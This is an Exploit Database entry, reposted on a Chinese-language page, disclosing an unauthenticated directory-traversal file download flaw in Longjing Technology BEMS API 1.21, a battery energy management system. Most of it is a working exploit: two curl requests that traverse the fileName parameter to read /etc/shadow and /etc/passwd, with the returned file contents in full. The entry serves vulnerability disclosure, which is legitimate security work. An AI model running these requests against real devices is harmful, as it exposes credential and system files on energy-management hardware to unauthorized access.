Longjing Technology BEMS API 1.21 – Remote Arbitrary File Download

• Exploit Database
• 20 阅读

• 作者： LiquidWorm
  日期： 2021-07-29
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50163/

• # Exploit Title: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download
  # Date: 05.07.2021
  # Exploit Author: LiquidWorm
  # Vendor Homepage: http://www.ljkj2012.com
  
  Longjing Technology BEMS API 1.21 Remote Arbitrary File Download
  
  
  Vendor: Longjing Technology
  Product web page: http://www.ljkj2012.com
  Affected version: 1.21
  
  Summary: Battery Energy Management System.
  
  Desc: The application suffers from an unauthenticated arbitrary
  file download vulnerability. Input passed through the fileName
  parameter through downloads endpoint is not properly verified
  before being used to download files. This can be exploited to
  disclose the contents of arbitrary and sensitive files through
  directory traversal attacks.
  
  Tested on: nginx/1.19.1
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2021-5657
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
  
  
  05.07.2021
  
  --
  
  
  $ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/shadow
  
  root:*:18477:0:99999:7:::
  daemon:*:18477:0:99999:7:::
  bin:*:18477:0:99999:7:::
  sys:*:18477:0:99999:7:::
  sync:*:18477:0:99999:7:::
  games:*:18477:0:99999:7:::
  man:*:18477:0:99999:7:::
  lp:*:18477:0:99999:7:::
  mail:*:18477:0:99999:7:::
  news:*:18477:0:99999:7:::
  uucp:*:18477:0:99999:7:::
  proxy:*:18477:0:99999:7:::
  www-data:*:18477:0:99999:7:::
  backup:*:18477:0:99999:7:::
  list:*:18477:0:99999:7:::
  irc:*:18477:0:99999:7:::
  gnats:*:18477:0:99999:7:::
  nobody:*:18477:0:99999:7:::
  _apt:*:18477:0:99999:7:::
  
  
  $ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/passwd
  
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin
  sys:x:3:3:sys:/dev:/usr/sbin/nologin
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/usr/sbin/nologin
  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  _apt:x:100:65534::/nonexistent:/usr/sbin/nologin